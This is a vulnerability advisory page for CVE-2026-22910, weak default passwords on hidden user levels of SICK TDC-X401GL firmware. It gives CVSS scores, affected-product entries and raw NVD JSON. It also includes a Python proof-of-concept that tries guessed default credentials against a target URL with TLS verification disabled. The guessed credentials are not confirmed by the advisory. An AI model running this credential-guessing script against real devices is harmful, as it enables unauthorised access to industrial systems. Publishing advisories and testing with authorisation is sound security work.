Security Vulnerability Report
中文
CVE-2026-22910 CVSS 7.5 HIGH

CVE-2026-22910

Published: 2026-01-15 13:16:06
Last Modified: 2026-01-23 15:45:28
Source: [email protected]

Description

The device is deployed with weak and publicly known default passwords for certain hidden user levels, increasing the risk of unauthorized access. This represents a high risk to the integrity of the system.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:* - NOT VULNERABLE
SICK设备 - 隐藏用户级别(使用默认密码的特定版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 """ CVE-2026-22910 PoC - SICK Device Default Credentials Note: This is a conceptual PoC for authorized security testing only. """ import requests from requests.auth import HTTPBasicAuth import sys # Common default credentials for SICK devices (hidden user levels) DEFAULT_CREDENTIALS = [ {'username': 'service', 'password': 'service'}, {'username': 'admin', 'password': 'admin'}, {'username': 'sick', 'password': 'sick'}, {'username': 'root', 'password': 'default'}, {'username': 'operator', 'password': 'operator'}, ] def check_default_credentials(target_url): """ Test if target SICK device accepts default credentials """ print(f"[*] Testing {target_url} for default credentials...") for cred in DEFAULT_CREDENTIALS: try: response = requests.get( target_url, auth=HTTPBasicAuth(cred['username'], cred['password']), timeout=10, verify=False ) if response.status_code == 200: print(f"[+] SUCCESS: Found valid credentials!") print(f" Username: {cred['username']}") print(f" Password: {cred['password']}") return True except requests.exceptions.RequestException as e: print(f"[-] Error connecting to {target_url}: {e}") print("[-] No default credentials found") return False def main(): if len(sys.argv) < 2: print(f"Usage: {sys.argv[0]} <target_url>") print(f"Example: {sys.argv[0]} https://192.168.1.100") sys.exit(1) target = sys.argv[1] check_default_credentials(target) if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22910", "sourceIdentifier": "[email protected]", "published": "2026-01-15T13:16:05.673", "lastModified": "2026-01-23T15:45:28.423", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The device is deployed with weak and publicly known default passwords for certain hidden user levels, increasing the risk of unauthorized access. This represents a high risk to the integrity of the system."}, {"lang": "es", "value": "El dispositivo se despliega con contraseñas predeterminadas débiles y públicamente conocidas para ciertos niveles de usuario ocultos, aumentando el riesgo de acceso no autorizado. Esto representa un alto riesgo para la integridad del sistema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1391"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:sick:tdc-x401gl_firmware:*:*:*:*:*:*:*:*", "matchCriteriaId": "59BB5012-A895-4A93-B36F-A062A9389DB1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:sick:tdc-x401gl:-:*:*:*:*:*:*:*", "matchCriteriaId": "9A95E220-0816-4885-AB7C-D0BB6F27DB7A"}]}]}], "references": [{"url": "https://sick.com/psirt", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.cisa.gov/resources-tools/resources/ics-recommended-practices", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://www.first.org/cvss/calculator/3.1", "source": "[email protected]", "tags": ["Not Applicable"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.json", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/.well-known/csaf/white/2026/sca-2026-0001.pdf", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.sick.com/media/docs/9/19/719/special_information_sick_operating_guidelines_cybersecurity_by_sick_en_im0106719.pdf", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.